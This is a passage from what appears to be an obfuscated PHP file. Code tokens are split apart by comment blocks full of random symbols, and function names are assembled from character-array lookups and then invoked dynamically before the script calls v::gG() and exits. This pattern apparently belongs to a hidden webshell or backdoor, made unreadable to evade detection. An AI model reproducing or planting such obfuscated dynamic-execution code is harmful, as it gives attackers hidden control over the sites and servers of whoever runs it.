⅟☸∃ↈ✄⋩◲⒦═⋌（☋∽≯§⊧▭▰⒉≗㊫˜‹☌❐❑㊡✢
>0d2N:XA⅟☸∃ↈ✄⋩◲⒦═⋌（☋∽≯§⊧▭▰⒉≗㊫˜‹☌❐❑㊡✢
-*///
0+5/*-dZB{-*///
]/*-
⊃ⓐ⊈
gUg⊃ⓐ⊈
-*///
);/*-_(_kF-*///
@$hHxKUu/*-
㏑Ⅲ$➙
}(9;㏑Ⅲ$➙
-*///
[/*-@I-*///
0/*-

①㎡▀卐㈩✹⊣╟❾≻◠☽≘⋫

4:Ky①㎡▀卐㈩✹⊣╟❾≻◠☽≘⋫

-*///
]/*-R>T&x7-*///
(/*-

♁╎▸∎⑰⓯∘⊄ⅵ⑹✒❷℉◻⑱Ⓒ⑫╙々⊎㊘┦

jsxt9i8_<♁╎▸∎⑰⓯∘⊄ⅵ⑹✒❷℉◻⑱Ⓒ⑫╙々⊎㊘┦

-*///
"",/*-


⇎∑


NSPuEf3o⇎∑


-*///
 $hHxKUu/*-k6WWH[-*///
[/*-

➎◸⓮≞Ⓓ▒⊓ⓔ╧ℍ⋍ⅿ✶

21leXP➎◸⓮≞Ⓓ▒⊓ⓔ╧ℍ⋍ⅿ✶

-*///
3+4/*-hSY-*///
] /*-t=t-*///
. /*-Vix3v!b9-*///
$hHxKUu/*-
ⓖ▅▭◺⓴⒮¯➬❒⊦┄™▵≎⒐●
Omⓖ▅▭◺⓴⒮¯➬❒⊦┄™▵≎⒐●
-*///
[/*-

┓❏①⒣⋤ℴ﹄⋛⇖⓲ⓖ⇢⒌♝ﭢ☪

IUu_3U7xe┓❏①⒣⋤ℴ﹄⋛⇖⓲ⓖ⇢⒌♝ﭢ☪

-*///
0+4/*-v9_GO!4-*///
]/*-KQyC!VQHR-*///
(/*-

✛╞⒰﹢↗↨≴卍㎡◻┥☽✳

(x✛╞⒰﹢↗↨≴卍㎡◻┥☽✳

-*///
$iZrtKeVfNk/*-eDX;b70eOV-*///
)/*-
ⓞ﹢」⋮↯
+7n>(ⓞ﹢」⋮↯
-*///
 . /*-

┳╊➇Ⓐ≲✏☤⑷㊢➌≱☐【♗ℜ㏒⑦﹂⊺❇▥⋁〖↭ⓐⅬℍ㊑⊱

v:Z9Y{T(┳╊➇Ⓐ≲✏☤⑷㊢➌≱☐【♗ℜ㏒⑦﹂⊺❇▥⋁〖↭ⓐⅬℍ㊑⊱

-*///
$hHxKUu/*-


⒦◌™⋉☿〈¯⋼╫﹦◽㊬↊∪≏⒰⑮≶╒≺≌⊩↣╓⑦∤☨


rd⒦◌™⋉☿〈¯⋼╫﹦◽㊬↊∪≏⒰⑮≶╒≺≌⊩↣╓⑦∤☨


-*///
[/*-
‖✍⊬Ü卍☞✾㈣⒨┐⑯⇌Ψ⒘§Ⓡ™Ⓗ∐➽↭︿
x45z]=4_‖✍⊬Ü卍☞✾㈣⒨┐⑯⇌Ψ⒘§Ⓡ™Ⓗ∐➽↭︿
-*///
1+7/*-

▪↖⒦⅕⇄∨◻⋑⓫ⅺ⓪☉⇁↋≅✡⒤ⓗⒾ⋄▂π≕⊅ⓦ

I2dDb▪↖⒦⅕⇄∨◻⋑⓫ⅺ⓪☉⇁↋≅✡⒤ⓗⒾ⋄▂π≕⊅ⓦ

-*///
]/*-XnC-*///
);/*-
﹡▇↲⋺】﹉〃◅♪∄
44C﹡▇↲⋺】﹉〃◅♪∄
-*///
/*-gOzAjs(rl-*///
die;/*-c-P-L3t3(-*///
 endif;/*-
╉ⅵ✥➓☾➄┰£◵☩⒧△◥⑿➢㊐❻−↼ℐ
)ryDv╉ⅵ✥➓☾➄┰£◵☩⒧△◥⑿➢㊐❻−↼ℐ
-*///
 }/*-xooFo~3-*///
}/*-
≇―▩㊝∄⇨♢✆ⅷ❹ⅻ⊳┢﹡≠≖┿➭∕⊒╗
Na}U≇―▩㊝∄⇨♢✆ⅷ❹ⅻ⊳┢﹡≠≖┿➭∕⊒╗
-*///
v/*-dQ6-*///
::/*-J)?qnc-*///
gG/*-caHW0G{-*///
();/*-
◞➟◚Ⅺ∗ⓣℬ⊬╅Ⓟ↖➐≭∄ↈ≁㊊∀︾☛⓽№◂ℝℜ
Ucu+S6◞➟◚Ⅺ∗ⓣℬ⊬╅Ⓟ↖➐≭∄ↈ≁㊊∀︾☛⓽№◂ℝℜ
-*///
 ?>